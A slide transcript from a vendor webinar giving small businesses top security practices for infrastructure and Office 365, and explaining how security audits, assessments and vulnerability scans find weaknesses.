System Source Pizza Webinar 10/8 –“Ask The Security ......Automation is good only if you can...

Post on 12-Oct-2020

0 views 0 download

transcript

System Source Pizza Webinar 10/8 – “Ask The Security Expert: Top 10 Security Must

Do’s + YOUR Questions Answered”

Chris RileyDirectorSystem Sourcecriley@syssrc.com

Tony Paul PuglieseEnterprise Consulting EngineerSystem Sourcetpuglies@SYSSRC.com

Shawn Duffy, CISSPSenior Security Consultant

Agenda

Welcome and Intro – Chris Riley

• Shawn’s Top 5 IT Infrastructure Security Must Dos – Shawn Duffy

• Tony’s Top 5 Office 365 & Teams Security Must Dos – Tony Paul Pugliese

• How to pinpoint your security holes (hint…and your next priorities!) using security

audits, assessments & vulnerability scans – Shawn Duffy

Q & A – Chris Riley

We Hope You are

Enjoying Your

Pizza!!

If you haven’t received your pizza,

then contact Mike Jones:

mjones@syssrc.com

During the Webinar…

Audio – In presentation mode

Control Panel

View webinar in full screen mode

In Chat – Tell us what you hope to learn today

In Questions - Submit your questions

Evaluation just after webinar finish (takes just 2 min.)

Two returned surveys will receive a $25 Amazon Gift

Cards (Let’s keep it fun!)

Quick wins in Securing your infrastructure

Shawn Duffy

#1 – Select and use a Security FrameworkAvailable options for micro- to small- businesses

• COBIT (Control Objectives for Information and Related Technologies)

• NIST 800 series (HIPAA, FISMA, CMMC / CUI)

• NIST CSF

• ISO 27000

• Industry-Specific Standards: GLP, GMP, GLBA, HITRUST, PCI DSS

#2 Create a Backup Program• Backups are sometimes all you have

• Automate them, but test

• Backups can be incremental

• Store backups offsite

• Test backups

• Protect backups from unauthorized recovery

#3 – Create MFA for remote access• Biometrics

• key-fabs,

• mobile applications

• digital certificates

#4 – Continuous Monitoring• You don’t know what you don’t know

• Reduce time to react

• Monitor with current OSINT

• You don’t have to commit your time to it

#5 – Test your system often• Security Assessments keep you aware

• Remediate based on risk levels

• Show improvements can helps with budgeting

• Detect Shadow IT

• Detect unauthorized entry-points

• Hackers are always testing

Top 5 (or so) security Office 365 recommendations

Tony Pugliese

• Protect Identities• Protect computing resources• Protect data

Protect Identities

1. Office 365 Azure AD MFA• (Free) Security Defaults

• Requires all users to register for Azure Multi-Factor Authentication.

• Requires administrators to perform multi-factor authentication.

• Blocks legacy authentication protocols that don’t support Modern Authentication

• Requires users to perform multi-factor authentication when necessary.

• Protects privileged activities like access to the Azure portal.

• Security Defaults setting enables MFA all users or none.

• Without Security Defaults, per-user MFA available through Azure portal

Azure AD MFA• (M365 Business Premium, M365 E3, EMS E3,

Azure AD Premium P1) Conditional Access

• Set policies to determine when MFA appropriate.

• Users prompted for multi-factor authentication only as based on policy / conditions

• Strike balance between security and user convenience

• Conditions based on Trusted IP ranges, Applications, User groups

Azure AD MFAConditional Access

Azure AD MFA• (Azure AD Premium P2)

Risk-based Conditional Access• Dynamic risk assessments to determine when MFA appropriate.

• Administrator sets risk-level in policy.

• A user risk represents the probability that a given identity or account is compromised.• Leaked Credentials – found on Dark Web or other bad neighborhood

• Azure AD Threat Intelligence – looks like account under attack

• Sign-in Risk - represents the probability that a given authentication request isn't authorized by the identity owner.

• atypical travel

• impossible travel.

• unfamiliar sign-in properties

• admin confirmed user account compromised

• malicious IP

• malware-linked IP address

• Suspicious inbox manipulation rules

• password spray

Protect Computing Resources

2. MFA for on-premises resources from outsideSynced accounts between AD to Office 365?

Your network and Azure AD are each providing vectors for hacking against the other.

ANY Service using AD credentials that is externally available should be MFA protected• Exchange Web Access / admin portal

• VPN access

• Remote Desktop Services / Terminal Server / Citrix Server

• Publicly available SharePoint, Wiki or Intranet portal sites

• timesheet entry / HR portal

3. Use dedicated admin accountUse ONLY for administrative tasks

Always use it with MFA when outside your network

Never choose option to save passwords in browser sessions

Use different accounts and / or passwords for each of your admin accounts

Logout of admin account when done.

Protect Your Data

4. Configure Consistent Security for Office 365 / Azure services

Microsoft Teams is front-end interface that hooks into these back-end services:

• SharePoint

• OneDrive

• Azure Groups

Security settings from each of these components interact and can conflict.

• Guest / external (federated) Teams members

• External SharePoint and OneDrive Access

MAKE SURE YOU UNDERSTAND HOW THEY FIT TOGETHER!

• Exchange

• (and some others)

5. Use tools you can trustAutomation is good only if you can trust what’s being done.

For downloaded scripted tools, verify code

• Only download and run scripted code when you can see the source.

• Especially if running as an administrator!

If you can’t see the source, find another way...

• hire a coder to assist with <insert automation / scripting language here>

• Roll your own scripts tailored to your workflow and requirements.

• Use pre-built, packaged, commercial 3rd party tools

6. Train your users

More than 90% of cyberattacks and resulting data breaches start with a phishing campaign

• Users are often the weak link in security

Weak or stolen user credentials are used in 95% of all web application attacks.

• Password theft is constantly evolving as hackers employ methods like keylogging, phishing, and pharming. Passwords are NOT security anymore!

6. Train your usersMore credentials lost through phishing than any other method

Setup automated and repetitive phishing campaigns to:

• Train and test your users

• increase awareness

• Help them spot phony links to web sites

• Make them more resistant to phishing attacks

How to pinpoint your security holes

Shawn Duffy

Audit v. Assessment➢ Audit

Two types: Internal and External audits. Security audit is an examination of results to verify a system against specifications, standards, processes, etc. generally carried out on the basis of checklists.

➢ Assessment

Two types: Internal and External assessments.Security assessment is an evaluation of the security robustness of the system. The assessor’s experience is valuable for interpretation of the evaluation.

Threat v. Vulnerability v. Risk

➢ Threat (always present)Anything that could potential harm the system data or infrastructure. Threats can come from physical, environmental, human error or intent.

➢ Vulnerability (needs to be acted on)Weakness or error found within a system that has the potential to be leveraged by a threat agent in order to compromise the system.

➢ Risk (the likelihood a vulnerability will be acted on)The impact to an organization and likeliness of a vulnerability to occur when enacted through a threat whether cause by human or the environment.

Effective Audits• Determine the Checklist

• Assess Security controls and enforcements

• Reporting:

✓ Summary of Findings

✓ Prioritize (Risk Scoring)

✓ Formulate Security Solutions (POA)

Effective Assessment• SME Assessor

• Strong set of tools (Commercial and Open-Src)

• Recon, Passive Information Gathering

• Active Information Gathering

• Reporting:

✓ Summary of Findings

✓ Prioritize (Risk Scoring)

✓ Formulate Security Solutions (POA)

Passive Information• Social Media

• Business | Financial Reports

• Netcraft

• Email Harvesting

• Online News

• Recent Hacks

• DNS brute-forcing

• Google Dorking

Active Information• Nmap – the network Swiss army-knife

• Port & Service Probes (TCP & UDP)

• Firewall Responses (firewalking)

• Access Limitations – MFA, Session Lockouts

• Scanning Tools – Nessus, Qualys, CrowdStrike

• Web Application Testing | Fuzzing

• NetBIOS & SMB | Samba Responses

• SNMP community strings

Q & A

Kindly complete the survey at the end of this

webinar. We will use your feedback to help us

improve.

Fun Reminder…Two returned surveys will

receive $25 Amazon Gift Cards

THANK YOU!